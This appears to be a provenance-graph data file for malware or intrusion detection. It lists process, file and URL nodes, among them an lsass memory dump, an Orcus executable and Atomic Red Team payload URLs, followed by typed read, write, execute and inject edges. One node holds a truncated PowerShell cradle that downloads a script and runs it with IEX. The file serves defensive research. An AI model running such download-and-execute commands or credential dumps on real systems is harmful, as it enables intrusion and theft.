26
MP-build3.exe 
MF-%tmp%\lsass.DMP
SO-https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi
SF-C:\Users\admin\AppData\Local\Temp\ma
MP*-WsatConfig.exe
MF-C:\Users\admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt
MF-C:\Windows\Temp\Crashpad\attachments\IMEDICTUPDATE.exe
TP-ipconfig.exe
MP*-untitled boxing game Good - Linkvertise Downloader_ns-hSm1.exe 
MP*-Orcus.exe 
SF-C:\Windows\SysWow64\regsvr32.exe
SO-https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml
TF-C:\Users\admin\Desktop\0IuqaJTsFmOw8k4.exe
MP-msedge.exe
MP*-INV 88000354.exe 
MF-C:\Users\admin\AppData\Local\Temp\tmp6B8.tmp
MF-Files\VideoLAN\VLC\vlc.exe
MF-RemoteCertTrust.ps1
MF-C:\Users\admin\AppData\Local\Temp\sample
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
MP-863e7c22c771e4005197ae28363584f8.exe 
TP-Powershell.exe
MF-C:\Users\admin\AppData\Local\Temp\Protected
MF-\Users\admin\AppData\Roaming\file.exe
MF-C:\Users\admin\Desktop\List
MP-Client.exe 
61
0 1 WR
0 2 ST
0 3 UK
4 1 WR
4 2 ST
4 5 RD
4 6 WR
7 1 RD
2 7 RF
4 7 UK
8 1 WR
2 8 RF
8 5 EX
8 6 WR
9 1 WR
9 2 ST
9 5 WR
9 6 WR
8 10 EX
9 10 RD
8 11 ST
9 11 ST
8 12 RD
9 12 RD
13 5 EX
13 6 WR
8 13 UK
14 5 RD
14 6 WR
14 10 RD
14 11 ST
14 12 WR
9 15 EX
14 15 WR
9 16 RD
14 16 CD
9 17 WR
14 17 WR
9 18 RD
14 18 RD
9 19 ST
19 14 RF
20 10 RD
11 20 RF
20 12 UK
21 11 ST
14 21 IJ
21 15 WR
21 16 WR
21 17 EX
21 18 UK
14 22 RD
14 23 RD
14 24 WR
25 15 WR
25 16 WR
25 17 WR
19 25 RF
25 22 CD
25 23 WR
25 24 UK

